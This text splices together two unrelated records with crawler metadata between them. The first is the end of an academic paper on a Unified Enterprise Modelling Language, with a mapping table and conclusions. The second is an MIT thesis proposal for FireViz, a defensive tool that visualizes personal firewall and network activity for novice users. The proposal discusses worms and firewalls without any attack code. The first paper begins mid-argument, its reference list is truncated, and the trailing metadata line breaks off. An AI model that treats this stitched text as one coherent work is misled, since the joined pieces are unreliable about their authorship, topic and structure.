In fact, it is often true that a language can be used as a meta-modelling technique for another (sometimes, the same) language. correspondences among constructs between two distinct languages have to be precisely defined by comparing semantics of these constructs. However, this is a difficult task because: - EMLs are often based on informal semantics, i.e. some natural descriptions of constructs meaning. - The way in which EMLs are used in specific context and situations may change. Therefore, as suggested in Sect. 3.1, mappings between languages should rely on reasonable hypotheses should be clearly stated and become the base for building the language, and possibly be standardised further. Fig. 1: The UEML 1.0 meta-model Table 1: Extract of the common concepts of UEML <table> <thead> <tr> <th>COMMON CONCEPT</th> <th>GRAI</th> <th>IEM</th> <th>EEML</th> </tr> </thead> <tbody> <tr> <td>ACTIVITY</td> <td></td> <td>Extended activity</td> <td>Action state</td> </tr> <tr> <td>ROLE</td> <td></td> <td>Not explicit</td> <td>IEM Object state</td> </tr> <tr> <td>RESOURCE</td> <td></td> <td>Resource</td> <td>Resource class</td> </tr> <tr> <td>INPUT/OUTPUT FLOW</td> <td></td> <td>Input/Flow</td> <td>Successor/ProcessElement</td> </tr> <tr> <td>CONSTRAINT FLOW</td> <td></td> <td>Control/Flow (trigger=false)</td> <td>No direct</td> </tr> <tr> <td>CONTROL FLOW</td> <td></td> <td>Control/Flow (trigger=true)</td> <td>ControlSuccessor/ProcessElement</td> </tr> <tr> <td>RESOURCE FLOW</td> <td></td> <td>Resource/Flow (trigger=false)</td> <td>ResourceSuccessor/ResourceState</td> </tr> <tr> <td>CONNECTION OPERATOR</td> <td></td> <td>Logical operator</td> <td>Connection Element State</td> </tr> <tr> <td>PORT</td> <td></td> <td>Connector</td> <td>Port</td> </tr> </tbody> </table> Mappings can be defined, more or less precisely, in various languages. For example, they can be expressed informally in natural language or through the use of a meta-modelling language. From a technical viewpoint, XSLT is a proposal to define transformation of XML documents based on a set of transformation rules expressed on the basis of XML schemas. The advantage of this approach is that software tools are already operational to interpret these mappings and apply them on XML documents. This approach could be considered as a means of implementing correspondences among EMLs, provided that these have XML syntax. Defining relationships at the language level can also be done in an “a priori” manner when new methodologies and methods are under definition. Therefore, a UEML can be a good starting base for placing under control the process of defining new methods and methodologies as well as the rules applied in a specific methodology. 4. CONCLUSION AND OUTLOOK 4.1 Future perspective for enterprise modelling This analysis of the state of the art in enterprise modelling (Petit, and al., 2002) demonstrates the need to define and develop a UEML approach to solve the current problems faced by workers in the enterprise modelling domain. But such UEML approach can only be successful and effective under two conditions: - Providing a global approach of interoperability among enterprise modelling software going further than only providing a common format of exchange; - Making clear and effective the link between enterprise modelling and Enterprise Applications and Software. 4.2 UEML as a global approach to enterprise modelling As stated earlier, a common exchange format, if deemed successful, cannot be described independently of mappings to and from existing EMLs. Furthermore, this requires the explicit definition of meta-models of the involved languages and of the mappings among their concepts. However, in order to avoid that UEML, as a common format, becomes yet another language among the large set of existing ones, it requires a larger view of interoperability among EM tools. The UEML language and approach must be flexible to be able to cope with future proprietary emerging languages and with the evolution of existing EMLs. The long term objectives of a UEML approach would then be to provide the necessary concepts and tools to achieve the following: - Interoperability between already existing supporting tools as well as newly developed tools, - Well-founded integration basis between distinct enterprise modelling languages, - Consistent global models on which also distinct methodologies can be integrated, - Improvement of existing methodologies and definition of new methodologies. These objectives pose a number of requirements on the UEML approach: - The availability of meta-modelling concepts, methods and tools to properly define EMLs (existing ones, new emerging ones, UEML, their extensions and particularisations for specific purposes or applications); - The availability of concepts, methods and tools to properly define relationships among distinct EMLs and a UEML together with relationships between models created with different EMLs and UEML; - The concepts and tools to properly define methodologies associated with EMLs, including UEML; - The specification of an open architecture in which all these elements can be implemented to provide an evolutionary multi-language platform for enterprise modelling centred on UEML. This platform would allow creating coherent, global and logically centralised (integrated) models of the enterprise but which may be distributed within different enterprise modelling applications at a physical level. 4.3 From enterprise modelling to enterprise systems We consider that Enterprise Engineering or Enterprise Modelling make sense provided that we are able to link the tools developed in this field with the Enterprise Applications and Software. Enterprise Modelling must be considered as the way to design the architecture and the model of the enterprise independently from existing or future Enterprise Applications and Software. We see the various levels as shown in the Fig. 2. ![Fig. 2: Enterprise Modelling and Enterprise Application Levels](image) To our opinion, the future within ten years will be capabilities to generate, from the enterprise modelling level, the specifications allowing to choose or customize Enterprise Applications and Software (EAS) or to derive specifications of software applications for the enterprise models. Moreover, we believe that the EAS such as ERP, SCM or CRM will no longer have a centralised structure. Rather, they will have a modular and distributed structure. Each module will be chosen and customized according to specifications generated from the enterprise models. On the one hand, such a structure might decrease the time and cost of EAS development, and increase the adequacy of EAS to the needs of the enterprise. This should result in an increased acceptance of EAS by end-users, higher adaptability of EAS to the enterprise structure and improved Return on Investment of EAS development. REFERENCES architecture - evolution and application in enterprise engineering and integration. *Computers in Industry, special issue, 40(2-3).* UML (2003). *UML 1.5 specification*, OMG. ACKNOWLEDGEMENT The authors would like to thank all the UEML core members for their scientific contribution to this work. This work was funded by the European Commission IST 5th framework programme.
{"Source-Url": "https://hal.science/hal-00120943/file/incom2004_123_panetto_and_al.pdf", "len_cl100k_base": 5490, "olmocr-version": "0.1.50", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 21986, "total-output-tokens": 6350, "length": "2e12", "weborganizer": {"__label__adult": 0.0003638267517089844, "__label__art_design": 0.0012197494506835938, "__label__crime_law": 0.0005216598510742188, "__label__education_jobs": 0.0026454925537109375, "__label__entertainment": 0.0001246929168701172, "__label__fashion_beauty": 0.0002570152282714844, "__label__finance_business": 0.0054473876953125, "__label__food_dining": 0.00044918060302734375, "__label__games": 0.0005598068237304688, "__label__hardware": 0.000965118408203125, "__label__health": 0.0005755424499511719, "__label__history": 0.0005178451538085938, "__label__home_hobbies": 0.00016498565673828125, "__label__industrial": 0.0023193359375, "__label__literature": 0.0005521774291992188, "__label__politics": 0.000446319580078125, "__label__religion": 0.0005335807800292969, "__label__science_tech": 0.1861572265625, "__label__social_life": 0.00016891956329345703, "__label__software": 0.05291748046875, "__label__software_dev": 0.74169921875, "__label__sports_fitness": 0.0002646446228027344, "__label__transportation": 0.0008387565612792969, "__label__travel": 0.00023627281188964844}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 28406, 0.03091]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 28406, 0.35838]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 28406, 0.89897]], "google_gemma-3-12b-it_contains_pii": [[0, 1063, false], [1063, 4337, null], [4337, 9744, null], [9744, 14721, null], [14721, 19706, null], [19706, 23062, null], [23062, 27445, null], [27445, 28406, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1063, true], [1063, 4337, null], [4337, 9744, null], [9744, 14721, null], [14721, 19706, null], [19706, 23062, null], [23062, 27445, null], [27445, 28406, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 28406, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 28406, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 28406, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 28406, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 28406, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 28406, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 28406, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 28406, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 28406, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 28406, null]], "pdf_page_numbers": [[0, 1063, 1], [1063, 4337, 2], [4337, 9744, 3], [9744, 14721, 4], [14721, 19706, 5], [19706, 23062, 6], [23062, 27445, 7], [27445, 28406, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 28406, 0.09244]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
5e16eb3a2a5721629ecc74d500f02f03ed539f69
Massachusetts Institute of Technology Department of Electrical Engineering and Computer Science Master of Engineering Thesis Proposal Title: FireViz: A Personal Network Firewall Visualizing Tool Submitted by: Nidhi Sharma 143 Albany Street, 134A Cambridge, MA 02139 Date of Submission: December 13, 2004 Expected Date of Completion: May, 2005 Laboratory: Computer Science and Artificial Intelligence Laboratory Abstract: This proposal outlines the development of a personal firewall visualizing tool called FireViz. FireViz leverages the human perceptual capabilities by employing various visual analytic techniques to depict network activity in real time. FireViz creates network usage profiles to depict anomalous behavior so that users may update their firewall security policies to provide greater computer security. The primary goal of FireViz is to educate typical computer users of the security threats their computers face, when connected to a network, through the use of effective visual cues. Contents 1 Introduction 3 1.1 The Need for User Education 3 1.2 The Need for Visualization and Usability Engineering 4 1.3 FireViz 4 2 Related Work 5 2.1 Network Traffic Analysis 6 2.2 Network Traffic Visualization 6 3 Design 7 3.1 Design Overview 7 3.2 Usability Engineering 10 4 Implementation 11 4.1 Overview 11 4.2 Evaluation 11 5 Schedule 11 6 Conclusion 12 1 Introduction The Internet is playing an increasingly important role in business, education and communication. While the Internet is a powerful means to establish connections to other remote hosts and effectively share useful data, it also serves as a medium to quickly and widely spread malicious data. Any host connected to a network is liable to be compromised by various means. Given this hostile internet environment, it is imperative that every computer connected to the internet be protected by appropriate means. While organizations have a greater incentive in securing their hosts and networks, ordinary home users are generally unaware of both the risks and the measures for preventing attacks. However, few personal security tools focus on educating users about the threats they are exposed to. This proposal describes a personal network visualization tool called FireViz. FireViz is designed to provide real-time visualization about the network processes on a given host and reveal potential threats and holes in the firewall’s security policies. 1.1 The Need for User Education Almost every computer connected to a network is constantly scanned for various security vulnerabilities. Worms and viruses are self-replicating programs that scan the network for vulnerable hosts and infect them. However, unlike viruses, worms need no user initiation, such as opening a file, and hence spread very quickly and easily. Attacks launched by viruses and worms, among others, quickly compromise the integrity of the affected host and spread to many others. Over the last few years, both the intensity and frequency of such network-based attacks have increased rapidly. By the end of the year 2004 alone, internet users will have been confronted by an estimated 100,000 forms of malicious attacks [1]. Not just the frequency and intensity of these attacks alone but even the shrinking time lag between when the vulnerabilities are announced and are exploited is a cause for major concern. A study of network worms launched over the last 24 months shows the time lag shrinking from 330 days for the Nimda Worm in 2002 [2, 3], to 16 days for the Sasser in April 2004 [4, 5]. According to the Gartner research [6], this pattern will only get worse. The study projects a 25% increase over the next several years in 'Zero Day' attacks, which exploit software vulnerabilities that have no known fixes [7]. Given these statistics, network users have to stay current with the existing security mechanisms that are already struggling to keep up with the sophistication of attackers today. As a result, the tolerance for any laxity in maintaining computer security is diminishing quickly. Statistics report that the average survival time for an unprotected computer has fallen from 40 minutes in 2003 to a mere 20 minutes in 2004 [8]. Many commercial developers are promoting tools to monitor and protect individual computers. Personal network firewalls such as Zone Alarm [9], Kerio [10] and Sygate [11] succeed in detecting and blocking numerous unfriendly network probes. However, few personal security applications focus on informing the user of the extent or nature of these threats. This is particularly evident when examining the user interfaces of these firewalls. Zone Alarm, for example, allows users to grant internet access to programs on application granularity. Once applications are deemed as trusted, the user is not given any further feedback on their network activity. This eliminates all feedback for users about potential attacks launched through these trusted applications. Zone Alarm does, however, provide users with information on port scanning activities. However, this information is provided to the users in very intrusive ways. As a result, many users turn off feedback from port scans, further reducing the information they may receive. Security is a complicated and an important aspect of using computers today. It is therefore essential for all users to understand the possible vulnerabilities their computers are exposed to. Given current trends, awareness is irreplaceable for survival. To this end, many network security applications have singularly failed to educate the very users they hope to protect. This lack of awareness also provides negative feedback by reducing users’ motivation to run personal security software at all times. It is no surprise then that a majority of internet users today fail to appreciate the reality of the security threats they are exposed to. In a study conducted by the NCSA, more than a third of the users surveyed said that they had a greater chance of winning the lottery than being hit by malicious code [12]. This is not just characteristic of novice users. Many sophisticated computer users are also unaware of the sheer volume of such threats. At the SC03 conference in 2003, many expert computer users were surprised at the number of malicious attempts at the conference’s high bandwidth network [13]. All these statistics suggest that there is immediate need for computer users to be educated of potential threats to their computers. 1.2 The Need for Visualization and Usability Engineering While many personal security applications do not provide any feedback or visual cues about network activity, they do maintain activity logs to a certain extent. These logs can, in principle, be used to find unexpected or anomalous network behavior that may be potentially harmful. The analysis of these logs can either be automated or conducted manually by an expert user. Automatic analysis is based on statistical modeling and machine learning. However such data mining techniques minimally engage human interaction and visualization and are likely to miss important features in the data. Manual inspection on the other hand is extremely tedious and both approaches are unreasonable to be expected from typical network users. Most importantly, these logs lack the situational context about what the user was doing at the time of the network activity. Such situational context is often more important than the nominal connection information to detect anomalous or unexpected activity. The human perceptual processor is capable of very fast visual processing; therefore, information depicted visually is easier to process and make out interesting patterns and features [14]. Consequently, tools that use visualization can leverage this human capability to enable users to easily discern anomalous network events. FireViz is a personal network firewall analyzer that uses information visualization to take advantage of the huge bandwidth of the human vision sensory system. It provides quick, real-time network information for users and uses visual cues to aid in detecting anomalous activities. The use of visual cues is especially useful when the users are unaware of what information to particularly look for, which is typical of network activity monitoring. FireViz works in conjunction with the users’ personal firewall and provides a more intuitive window to the network on which the firewall acts. 1.3 FireViz FireViz is an attempt at solving both these problems - educating users about network threats and doing so effectively. FireViz provides a peripheral window that runs alongside a personal network firewall and on which all activity is displayed. It detects all network activity in real-time and visually displays the information highlighting the most crucial pieces (such as host application, remote location and the ‘expectedness’ (the notion of expectedness is explained in detail in the design overview section of this proposal) of that connection), while allowing the user to analyze any subset of the events more closely. This way, FireViz creates a model of the network weather and behavior for the user. FireViz is based on a simple philosophy - You cannot protect when you can’t see. FireViz is used in conjunction with tools that enforce security policies - such as personal firewalls. However, no security system is perfect and hence there is constant need to update not just the policy-enforcing tools but also the policies themselves. However, users cannot be expected to update their security policies unless they know what the security policies should be. Furthermore, users cannot know what the security policies should be unless they have an understanding of which aspects of network behavior are expected and which ones are potential threats. Additionally, most users, when using the network, do not have security as a primary goal. This insight forms the basis of FireViz’s emphasis on the visualization of network security at a low cost to the user. FireViz is designed to be useful to even novice computer users. It aims to achieve the following main goals: - **Educate users about their network conditions.** The primary goal of FireViz is to educate users to keep up their defense mechanisms at all times by providing them with a more concrete network security model. - **Provide users with immediate feedback on all network activity.** This is to allow users to gain a deeper understanding of the network on which their computer is connected and develop a model of expected behavior. Such model is complemented by the situational context around each network activity. Such knowledge is helpful in detecting potentially malicious behavior. - **Employ effective visual techniques to display important information.** This will allow even novice users to easily discern exceptional events and examine them more closely. This goal translates into the following subgoals: - Since network activity is very frequent, all information must be provided in the most non-intrusive fashion as possible. - The cost on the user to retrieve this information should be minimal. This means that costly operations such as a complete context switch of users’ attention and current application should be avoided. - Since displaying all relevant information related to a specific connection is infeasible (since displaying more information also requires more space), the most easily available information should highlight only the most interesting features of the connection. All other information should be easily accessible if the user chooses to retrieve it. - The visualization should be selectively biased towards exceptional events or anomalies instead of routine, safe actions. - The visualization should effectively summarize the network weather for a certain time window. This will allow a user to get an overview of the network conditions even if she has been away from the computer. My thesis researches a novel way to visualize network activity. I believe that more effective visualization techniques will help achieve increased network awareness for users at a low learning cost and improved system security. 2 Related Work FireViz’s design objectives intersect two important research areas - network traffic analysis and network traffic visualization, both of which have a substantial body of current research. 2.1 Network Traffic Analysis Many users secure their computers using software mechanisms such as anti-viruses and personal network firewalls. Commercial firewalls such as ZoneAlarm [9], Kerio [10], Sygate [11] and Norton [15] make sure that the doors providing entry to the computer are not left wide open. Such doors may include vulnerable or buggy applications running on the computer that listen for network data. Firewalls isolate the host computers by intercepting each packet of data, incoming or outgoing, and selectively allowing some packets to continue, based on the security policies. The challenge for firewalls is to maintain accessibility while maintaining security. FireViz relies on both the system firewall and its own network scanning module to monitor network activity on the host it is running. Tools such as Netstat [16] and TCPView [17] provide the state of network activity on the host at any given point. FireViz uses such data for profiling expected network behavior and expose any anomalies as potential holes in the firewall’s security policy. However such tools may not be used to display activity that may already have been blocked by the firewall. FireViz maps the expectedness of allowed network accesses over time by monitoring observable features of network traffic such as the frequency of such accesses and the level of trust the firewall has for the access. By creating this model of expectedness, FireViz attempts to create a profile of what constitutes typical network activity. This profile is then compared to each new activity and the user can easily discern any deviation from the regular profile. This idea is similar to Anomaly detection systems (ADS) and Intrusion Detection Systems (IDS) such as Symantec Advantage [18] and Cisco Trellis [19]. Anderson et al. [20] describe such ADS systems in greater detail. However, FireViz uses network firewall data. Firewalls often merely implement security rules and do little intrusion detection. Thus, unlike visualization tools that are based on IDS data [13], FireViz’s profiles are constructed from data with no false positives. The various ADSs and tools such as NetFlows [21] record information on unidirectional end-to-end transactions, aggregating packets into larger flows of data. However these tools best operate on whole network systems rather than focusing on individual hosts on the network. Erbacher [22] describes visualizations of collections of individual transactions on a single machine. A similar tool, NVisionIP [23] spans multiple levels of network abstractions including the entire network, a subnet or a single machine. As evident from this sampling, various tools exist to monitor network traffic on various levels of abstraction. 2.2 Network Traffic Visualization The use of information visualization to display network traffic is an idea that is being widely experimented with. Information visualization mechanisms such as parallel coordinates and self-organizing maps [24, 25], have been specifically designed for this purpose. PortVis [26], which uses port-based detection of security activities, uses a visualization system that depicts the network traffic by choosing axes for important features of the connection data and creating cells in a grid which represent the network activity at that point. SeeNet [27] uses a colored grid, where each point represents the amount of traffic between the hosts represented by the x and y coordinates of the point. NVisionIP [28] uses a graphical matrix representation to show relationships between events on a network. VisFlowConnect [29] uses a parallel axes representation to display network traffic both within and between domains. However, all of these tools are designed to facilitate anomaly detection in whole network systems intended to be used by expert system administrators. FireViz on the other hand, is intended to be used by any users, regardless of their proficiency level and without any special training. The Spinning Cube of Potential Doom [?] provides an animated display of network traffic within a 3D cube that users can spin at will. The cube is intended to be used by novice users as well. However, unlike the cube and other network visualization tools, FireViz is a real-time display - it provides a display of the activity as it happens, without the user having to explicitly request the information or switch context to the visualization tool. Additionally, many of these tools provide network level information and finding host-specific information is relatively harder. Network Eye [30] attempts to provide a more balanced Host/Network picture by preserving the context when displaying the whole network at once and showing the interactions within the hosts and their programs. It is nevertheless still meant to be used by network administrators to detect potential threats. One of the goals of FireViz is to provide the user with the situational context along with network traffic. This goal has inspired us to provide animated logging features that basically allow the user to replay the moment of the said activity. VisFlowConnect [29] employs animation to replay events recorded in the data logs as they occurred. Teoh et al. [31] describe a focus + context radial layout to manage screen real estate by showing snapshots of activity in adjacent time periods in a circle around a larger focal image. Such a layout could be used to display a specific feature of network activity during consecutive time periods. 3 Design This section describes the design of FireViz. 3.1 Design Overview FireViz aims to achieve the above goals by employing a careful design. FireViz uses a number of visual variables [32] and redundant cues to meet the design requirements. To make the interface non intrusive, most information is displayed by transient elements such as labels and lines, instead of modal dialog boxes mandating user input. Furthermore, these elements are drawn on the user’s desktop instead of a separate FireViz application window. Each activity element is accompanied by a small label that shows the application that caused/received the activity, the remote host and a subjective frequency measure (such as ”First Access”, ”Rare”, ”Occasional” or ”Frequent”) [33]. This label appears for a few seconds, around the periphery of the screen, so to receive this information, the user need only to glance at the spot where the label appears. Also, the transient elements are replaced by a small lump at the same location. The lumps remain on the location for a few hours and can be clicked at any time to retrieve more detailed information. Additional cues such as the shape and color of the activity gives information about whether the connection involved the current process or a background process and whether the connection was successful. Figure 1 presents a snapshot of FireViz detecting network activity from Internet Explorer. As soon as the connection was detected, FireViz displayed a line from the application window to a label along the periphery of the screen. The label itself contains the hostname of the remote host and a subjective connection frequency measure ('Rare' in this case). This display stays on the users screen for all of five minutes and is replaced by the green lump alone. The green color signifies that the connection was allowed by the firewall. The green lump serves as a vestige to the said connection and can be clicked on to receive further information as shown in Figure 2. The transient display in Figure 1 very compactly encapsulates the remote host, the connection frequency, the firewall action (Allowed or Blocked) and the application that made the connection. Thus FireViz takes advantage of the situational context to compactly highlight the most interesting features of the connection. In case the application window was hidden or non-existent, FireViz would instead have a transient, flashing green circle along with the application icon. Another important aspect of the visualization in FireViz is the network mapping around the periphery of the user’s screen. FireViz creates an image of the network traffic involving the host by mapping the level of expectedness along the screen periphery. The expectedness is measured in terms of the frequency of the connection and the trust policy of the firewall (whether or not the connection is deemed "trusted" by the firewall). Each attempted (successful or unsuccessful, incoming or outgoing) connection to the machine is depicted, as described above, at the point which correlates with the expectation of that connection. As a certain network action is repeated multiple times, its expectation increases with the frequency. However, the most expected connections are those that are frequently made by trusted applications. Thus mere frequency does not make connections completely expected. An expectation-based profile, such as the one described above, in combination with some situational context can help users identify extraordinary events. For example, if a user checks her email, the connection to the mail server will likely be expected (since not only would the email client be a trusted application, email is also checked frequently). However, if one of the email messages had a web bug embedded in it which made a connection to some unidentified server, this connection will be unexpected (since the frequency of connections to the unidentified server from the user’s computer will likely be low, even though the mail client is a trusted application) and can successfully draw the user’s attention. On closer analysis of this connection, the user may realize that the connection was indeed unexpected and unsafe and consequently change the security policy in her firewall to disallow connection that said remote host. The location of the label along the periphery of the screen is dictated by the expectation of the connection. The expectation is a quantitative value which is a function of the frequency of the connection and the trust associated to it by the firewall. The expectation increases from the lower right corner of the screen to the top left corner of the screen in a continuous fashion. This mapping is translated into four nominal expectation values which are displayed in the labels. Thus if an unexpected network event occurred while the user was working on trusted applications, she could easily make out the unexpected event. As FireViz collects more data about the system’s network patterns, expected (i.e., trusted and frequent) activity slowly starts to fade away until it is no longer visible. This allows the user to focus her attention only on more interesting events, such as an untrusted application (e.g. spyware) making lots of connections. Finally, FireViz will employ an animated logging scheme to provide situational context in its logs. It will store not just the connection state for each network activity but also a screenshot of the computer at the time of the said activity. Thus, a user viewing the log can easily perceive (in the above example) that the mail client made a connection to the unknown server while checking a certain email message. No information is lost in the logs and hence the user can still make the appropriate security policy changes. An important consideration in the design of FireViz is to make the interface non-intrusive and helpful at the same time. Given the scenario where users do not have security as their primary goal and are unsure of what to look for, the interface has to be extremely easy to learn and use. Thus FireViz uses a simple expectation-based mapping that is easy to learn and provides an easy means to retrieve information that the user chooses. The following section describes the usability engineering process of FireViz in greater detail. ### 3.2 Usability Engineering The development process of the user interface for FireViz is following the spiral model [34] of iterative design [35]. As a first step, I conducted a user analysis and task analysis [36] to establish the user characteristics and identify the most commonly performed tasks. This stage involved informal interviews with various people in the target user population to assess their familiarity with personal firewalls and understand their security priorities. I identified two broad categories of users - novice computer users and expert computer users. FireViz is designed specifically keeping in mind the capabilities and concerns of novice users. This decision influenced many design features of FireViz. For instance, this lead us to incorporate minimal or no initial setup and configuration, carefully speaking the users’ language where appropriate and to provide an easily learnable profiling algorithm. After conducting the user analysis, I established some crucial tasks that the users would perform through FireViz. Once the tasks were identified, I started brainstorming about the user interface keeping in mind the design requirements outlined above. The implementation process started with developing low fidelity prototypes such as design sketches and paper prototypes and performing user tests. The next step involved the development of a horizontal computer prototype that incorporated the feedback from the user tests of the previous prototypes. The computer prototype was then heuristically evaluated by four users. Heuristic evaluation [37] revealed several issues with the computer prototype that were then rectified in the successive computer prototype. The next step is to user test the latest computer prototype while continuing to add more functionality on the backend. Finally, a fully operational version of FireViz will be distributed to users to run and test for extended periods of time to assess each aspect of FireViz’ user interface. Users will be asked to evaluate this version of FireViz on various dimensions of usability such as learnability, memorability and subjective satisfaction both through quantitative measures (such as time taken to perform a task) and qualitative feedback. 4 Implementation 4.1 Overview FireViz is implemented using the C# .NET technology. It is designed to work on the Windows XP operating system with a personal firewall. The choice of firewall will depend on the availability of an exported API to extract the requisite information, or at the minimum the source for the firewall. Certain open source firewalls for Windows, such as NetDefender, Fiseclab and Agnitum Outpost are available on the internet. The implementation of FireViz is structured around various independent modules that interact with each other. The following is a high level listing of FireViz’s modules - - **Network Monitoring Module** This module is responsible for detecting network activities. This is done in two parts. An independent thread scans for newly established connections and another scans the firewall logs for any blocked accesses. The network module detects new activities and notifies the View module and the logging module for further processing. - **Logging Module** This module maintains long term state on all network connections detected by the network module. The Logging module uses this information to calculate the expectedness of the connection. - **Display Attributes Module** This module uses data from the logging module and the firewall to calculate the display attributes for the view module. Display attributes such as the location and intensity of visible controls are calculated. Factors such as high frequency and firewall trust are considered here to produce attributes that highlight extraordinary behavior. For instance, a new, unexpected connection would be more prominent than a more expected connection. - **View Module** The view module receives information from the network module and the attribute module to show the appropriate transient activity on the user’s screen. It also provides means for user input. It is also responsible for placing an application icon for FireViz in the system tray. 4.2 Evaluation The backend for FireViz will be tested to ensure that it works accurately. The detection module will be tested to make sure that detected connections match the results from other similar tools such as TCPView [17] and that all firewall logged events are detected as well. The logging and attribute modules can be tested by checking that connection state is persisted and restored correctly across multiple sessions of running FireViz. Finally, the user interface will also be evaluated through user tests and heuristic evaluations, as outlined in the usability section of this paper. 5 Schedule The following proposed schedule outlines the major milestones in development of FireViz, including design and evaluation iterations and technology transfer. - **September 2004** - Brainstorming ideas and collecting related research; user analysis October 2004 - Low fidelity paper prototype testing November-December 2004 - Development and testing of hi-fidelity prototypes January-February 2005 - Second iteration of fully functional FireViz version March 2005 - Extensive user testing April-May 2005 - Documentation, technology transfer and publication of research results 6 Conclusion Even with the presence of personal security mechanisms such as personal firewalls, many malicious activities go unnoticed and unabated. Using existing knowledge about every network connection combined with a network behavior profile and proper use of visual cues, it is easy for even unsophisticated users to detect potentially malicious network activity. This proposal describes the design of a network firewall visualizing tool that can be used by typical network users to gain a deeper understanding of security vulnerabilities and leverage their protection mechanisms to gain a much higher level of security. References [1] Study: Consumers take cyberattacks lightly [2] Nimda worm strikes Net, email http://securityresponse.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html http://www.microsoft.com/security/incident/sasser.mspx http://securityresponse.symantec.com/avcenter/venc/data/w32.sasser.worm.html http://www3.gartner.com/research/focus_areas/asset_48267.jsp #Research [7] InfoSec 2003: 'Zero-day' attacks seen as growing threat http://www.computerworld.com/securitytopics/security/story/0,10801,88109,00.html?SKC=news88109 [8] Study: Unpatched PCs compromised in 20 minutes [9] ZoneAlarm Security Suite http://www.zonelabs.com [10] Kerio Personal Firewall http://www.kerio.com/us/kpf_home.html [12] AOL/NCSA Online Safety Study [15] Norton Personal Firewall http://www.symantec.com/sabu/nis/npf/ [16] Microsoft Windows XP - Netstat [17] Sysinternals TCPView http://www.sysinternals.com/ntw2k/source/tcpview.shtml [19] Cisco Trellis IDS [23] W. Yurcik, J. Barlow, K. Lakkaraju, and J. Rosendale. A prototype tool for visual data mining of network traffic for intrusion detection. 3rd *IEEE International Conference on Data Mining (ICDM), Workshop on Data Mining for Computer Security (DMSEC)*, 2003
{"Source-Url": "http://up.csail.mit.edu/projects/fireviz/proposal.pdf", "len_cl100k_base": 6106, "olmocr-version": "0.1.49", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 28760, "total-output-tokens": 7965, "length": "2e12", "weborganizer": {"__label__adult": 0.0003838539123535156, "__label__art_design": 0.0016183853149414062, "__label__crime_law": 0.0008959770202636719, "__label__education_jobs": 0.00446319580078125, "__label__entertainment": 0.00017654895782470703, "__label__fashion_beauty": 0.00022733211517333984, "__label__finance_business": 0.00044083595275878906, "__label__food_dining": 0.0002961158752441406, "__label__games": 0.0008492469787597656, "__label__hardware": 0.00518798828125, "__label__health": 0.0005764961242675781, "__label__history": 0.00043654441833496094, "__label__home_hobbies": 0.0001634359359741211, "__label__industrial": 0.0005598068237304688, "__label__literature": 0.0003848075866699219, "__label__politics": 0.00032901763916015625, "__label__religion": 0.0004575252532958984, "__label__science_tech": 0.2470703125, "__label__social_life": 0.00017893314361572266, "__label__software": 0.05755615234375, "__label__software_dev": 0.6767578125, "__label__sports_fitness": 0.0002455711364746094, "__label__transportation": 0.0004544258117675781, "__label__travel": 0.00016510486602783203}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 35185, 0.05131]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 35185, 0.47488]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 35185, 0.91773]], "google_gemma-3-12b-it_contains_pii": [[0, 1008, false], [1008, 1404, null], [1404, 5460, null], [5460, 9399, null], [9399, 12449, null], [12449, 16637, null], [16637, 19293, null], [19293, 19962, null], [19962, 22468, null], [22468, 26536, null], [26536, 29372, null], [29372, 31302, null], [31302, 33552, null], [33552, 35185, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1008, true], [1008, 1404, null], [1404, 5460, null], [5460, 9399, null], [9399, 12449, null], [12449, 16637, null], [16637, 19293, null], [19293, 19962, null], [19962, 22468, null], [22468, 26536, null], [26536, 29372, null], [29372, 31302, null], [31302, 33552, null], [33552, 35185, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 35185, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 35185, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 35185, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 35185, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 35185, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 35185, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 35185, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 35185, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 35185, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 35185, null]], "pdf_page_numbers": [[0, 1008, 1], [1008, 1404, 2], [1404, 5460, 3], [5460, 9399, 4], [9399, 12449, 5], [12449, 16637, 6], [16637, 19293, 7], [19293, 19962, 8], [19962, 22468, 9], [22468, 26536, 10], [26536, 